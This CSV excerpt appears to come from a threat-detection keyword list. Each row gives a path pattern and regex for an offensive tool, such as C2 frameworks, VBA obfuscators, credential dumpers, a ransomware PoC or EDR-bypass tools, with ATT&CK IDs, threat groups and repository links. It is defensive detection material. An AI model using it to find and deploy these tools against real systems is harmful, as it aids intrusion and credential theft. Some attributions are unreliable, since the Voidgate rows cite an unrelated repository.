"*/vba_gen.py*",".{0,1000}\/vba_gen\.py.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","1","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","12421"
"*/VBad.git*",".{0,1000}\/VBad\.git.{0,1000}","offensive_tool_keyword","vbad","VBad is fully customizable VBA Obfuscation Tool combined with an MS Office document generator. It aims to help Red & Blue team for attack or defense.","T1564 - T1117 - T1204 - T1070","TA0002 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Pepitoh/Vbad","1","1","N/A","N/A","8","6","544","127","2017-10-15T12:56:18Z","2016-03-09T12:36:04Z","12422"
"*/vbarandomizer.py*",".{0,1000}\/vbarandomizer\.py.{0,1000}","offensive_tool_keyword","spinningteacup","identify different parts of a vba script and perform substitutions","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","12423"
"*/VDR.git*",".{0,1000}\/VDR\.git.{0,1000}","offensive_tool_keyword","VDR","Vulnerable driver research tool - result and exploit PoCs","T1547.009 - T1210 - T1068 - T1055","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/TakahiroHaruyama/VDR","1","1","N/A","N/A","10","2","192","29","2023-11-01T00:06:55Z","2023-10-23T08:34:44Z","12425"
"*/VDR-main.zip",".{0,1000}\/VDR\-main\.zip","offensive_tool_keyword","VDR","Vulnerable driver research tool - result and exploit PoCs","T1547.009 - T1210 - T1068 - T1055","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/TakahiroHaruyama/VDR","1","1","N/A","N/A","10","2","192","29","2023-11-01T00:06:55Z","2023-10-23T08:34:44Z","12426"
"*/VectorKernel.git*",".{0,1000}\/VectorKernel\.git.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","1","N/A","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","12427"
"*/veeam_dump.py*",".{0,1000}\/veeam_dump\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","12428"
"*/veeam-creds.git*",".{0,1000}\/veeam\-creds\.git.{0,1000}","offensive_tool_keyword","veeam-creds","Collection of scripts to retrieve stored passwords from Veeam Backup","T1003 - T1555.005 - T1552","TA0006 - TA0007","N/A","Dispossessor - Dagon Locker","Credential Access","https://github.com/sadshade/veeam-creds","1","1","N/A","N/A","10","2","126","32","2024-12-12T10:23:54Z","2021-02-05T03:13:08Z","12429"
"*/VeeamHax.exe",".{0,1000}\/VeeamHax\.exe","offensive_tool_keyword","VeamHax","Exploit for CVE-2023-27532 against Veeam Backup & Replication (Plaintext credential leaking tool)","T1059 - T1203 - T1040 - T1189 - T1010","TA0001 - TA0002 - TA0009 - TA0011","More_eggs","Akira - FIN6","Exploitation tool","https://github.com/sfewer-r7/CVE-2023-27532","1","1","N/A","N/A","8","2","110","22","2023-03-23T18:03:27Z","2023-03-23T16:08:43Z","12430"
"*/Vegile.git*",".{0,1000}\/Vegile\.git.{0,1000}","offensive_tool_keyword","BruteSploit","Ghost In The Shell - This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process.unlimited your session in metasploit and transparent. Even when it killed. it will re-run again. There always be a procces which while run another process.So we can assume that this procces is unstopable like a Ghost in The Shell","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tool","https://github.com/screetsec/Vegile","1","1","N/A","N/A","N/A","8","726","164","2022-09-01T01:54:35Z","2018-01-02T05:29:48Z","12431"
"*/Venom.git*",".{0,1000}\/Venom\.git.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","1","N/A","N/A","10","10","2070","357","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z","12432"
"*/venom.git*",".{0,1000}\/venom\.git.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","12433"
"*/venom.sh *",".{0,1000}\/venom\.sh\s.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","0","#linux","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","12434"
"*/Venom.v1.0.1.7z*",".{0,1000}\/Venom\.v1\.0\.1\.7z.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","1","N/A","N/A","10","10","2070","357","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z","12435"
"*/Venom.v1.0.2.7z*",".{0,1000}\/Venom\.v1\.0\.2\.7z.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","1","N/A","N/A","10","10","2070","357","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z","12436"
"*/Venom.v1.0.7z*",".{0,1000}\/Venom\.v1\.0\.7z.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","1","N/A","N/A","10","10","2070","357","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z","12437"
"*/Venom.v1.1.0.7z*",".{0,1000}\/Venom\.v1\.1\.0\.7z.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","1","N/A","N/A","10","10","2070","357","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z","12438"
"*/Venom/tarball/v*",".{0,1000}\/Venom\/tarball\/v.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","1","N/A","N/A","10","10","2070","357","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z","12439"
"*/Venom/zipball/v*",".{0,1000}\/Venom\/zipball\/v.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","1","N/A","N/A","10","10","2070","357","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z","12440"
"*/venomoussway.py*",".{0,1000}\/venomoussway\.py.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","12441"
"*/ventrilo-info.nse*",".{0,1000}\/ventrilo\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12442"
"*/versant-info.nse*",".{0,1000}\/versant\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12443"
"*/victim_info_key.py*",".{0,1000}\/victim_info_key\.py.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","1","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","12444"
"*/villain.py*",".{0,1000}villain\.py.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","12447"
"*/viper.py*",".{0,1000}\/viper\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","12448"
"*/viper.sln*",".{0,1000}\/viper\.sln.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","12449"
"*/viper/Docker/*",".{0,1000}\/viper\/Docker\/.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","12450"
"*/viper/Docker/nginxconfig/htpasswd*",".{0,1000}\/viper\/Docker\/nginxconfig\/htpasswd.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","0","#linux","N/A","10","","N/A","","","","12451"
"*/vipermsf*",".{0,1000}\/vipermsf.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","Black Basta","Framework","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","N/A","1","N/A","N/A","N/A","N/A","12452"
"*/viperpython*",".{0,1000}\/viperpython.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","0","#linux","N/A","10","","N/A","","","","12453"
"*/viperpython.git*",".{0,1000}\/viperpython\.git.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","12454"
"*/virtualenvs/icebreaker*",".{0,1000}\/virtualenvs\/icebreaker.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","#linux","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","12455"
"*/Virus Rat v*.exe*",".{0,1000}\/Virus\sRat\sv.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","12456"
"*/VirusTotalC2/*",".{0,1000}\/VirusTotalC2\/.{0,1000}","offensive_tool_keyword","VirusTotalC2","Abusing VirusTotal API to host our C2 traffic. usefull for bypassing blocking firewall rules if VirusTotal is in the target white list and in case you don't have C2 infrastructure. now you have a free one","T1071.004 - T1102 - T1021.002","TA0011 - TA0008 - TA0042","N/A","N/A","C2","https://github.com/RATandC2/VirusTotalC2","1","1","N/A","N/A","10","10","27","81","2022-09-28T15:10:44Z","2022-09-28T15:12:42Z","12457"
"*/VisualBasicObfuscator*",".{0,1000}\/VisualBasicObfuscator.{0,1000}","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","N/A","10","10","2689","527","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z","12458"
"*/vmauthd-brute.nse*",".{0,1000}\/vmauthd\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12459"
"*/vmware_enum_*.rb*",".{0,1000}\/vmware_enum_.{0,1000}\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","12460"
"*/vmware_vcenter_cve_2020_3952*",".{0,1000}\/vmware_vcenter_cve_2020_3952.{0,1000}","offensive_tool_keyword","POC","CVE-2020-3952 POC exploitation","T1190 - T1040 - T1059.001","TA0001 - TA0003 - TA0009","N/A","Dispossessor","Exploitation tool","https://github.com/guardicore/vmware_vcenter_cve_2020_3952","1","1","N/A","N/A","7","3","273","60","2020-04-16T08:38:42Z","2020-04-16T07:40:51Z","12461"
"*/VMware-CVE-2022-22954*",".{0,1000}\/VMware\-CVE\-2022\-22954.{0,1000}","offensive_tool_keyword","POC","POC for VMWARE CVE-2022-22954","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/sherlocksecurity/VMware-CVE-2022-22954","1","1","N/A","N/A","N/A","3","281","53","2022-04-13T06:15:11Z","2022-04-11T13:59:23Z","12462"
"*/vmware-version.nse*",".{0,1000}\/vmware\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12463"
"*/vnc-brute.nse*",".{0,1000}\/vnc\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12464"
"*/vncdll.*",".{0,1000}\/vncdll\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","12465"
"*/vncdll/*",".{0,1000}\/vncdll\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","12466"
"*/vncEncoder.*",".{0,1000}\/vncEncoder\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","12467"
"*/VNCHooks*",".{0,1000}\/VNCHooks.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","12468"
"*/VNCHooks.*",".{0,1000}\/VNCHooks\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","12469"
"*/vnc-info.nse*",".{0,1000}\/vnc\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12470"
"*/vnc-title.nse*",".{0,1000}\/vnc\-title\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12473"
"*/vnik_v1.c*",".{0,1000}\/vnik_v1\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","12474"
"*/Voidgate.exe*",".{0,1000}\/Voidgate\.exe.{0,1000}","offensive_tool_keyword","Voidgate","bypass AV/EDR memory scanners. This can be used to hide well-known and detected shellcodes","T1027 - T1070 - T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/undergroundwires/privacy.sexy","1","1","N/A","N/A","9","10","4632","198","2025-04-21T21:36:39Z","2019-12-31T14:38:28Z","12475"
"*/Voidgate.git*",".{0,1000}\/Voidgate\.git.{0,1000}","offensive_tool_keyword","Voidgate","bypass AV/EDR memory scanners. This can be used to hide well-known and detected shellcodes","T1027 - T1070 - T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/undergroundwires/privacy.sexy","1","1","N/A","N/A","9","10","4632","198","2025-04-21T21:36:39Z","2019-12-31T14:38:28Z","12476"
"*/voldemort-info.nse*",".{0,1000}\/voldemort\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12477"
"*/Volumiser.exe*",".{0,1000}\/Volumiser\.exe.{0,1000}","offensive_tool_keyword","Volumiser","Volumiser is a command line tool and interactive console GUI for listing - browsing and extracting files from common virtual machine hard disk image formats.","T1560.001 - T1059 - T1114 - T1005","TA0005 - TA0009","N/A","N/A","Collection","https://github.com/CCob/Volumiser","1","1","N/A","N/A","7","4","379","42","2025-04-22T15:47:53Z","2022-11-08T21:38:56Z","12478"
"*/Volumiser.git*",".{0,1000}\/Volumiser\.git.{0,1000}","offensive_tool_keyword","Volumiser","Volumiser is a command line tool and interactive console GUI for listing - browsing and extracting files from common virtual machine hard disk image formats.","T1560.001 - T1059 - T1114 - T1005","TA0005 - TA0009","N/A","N/A","Collection","https://github.com/CCob/Volumiser","1","1","N/A","N/A","7","4","379","42","2025-04-22T15:47:53Z","2022-11-08T21:38:56Z","12479"
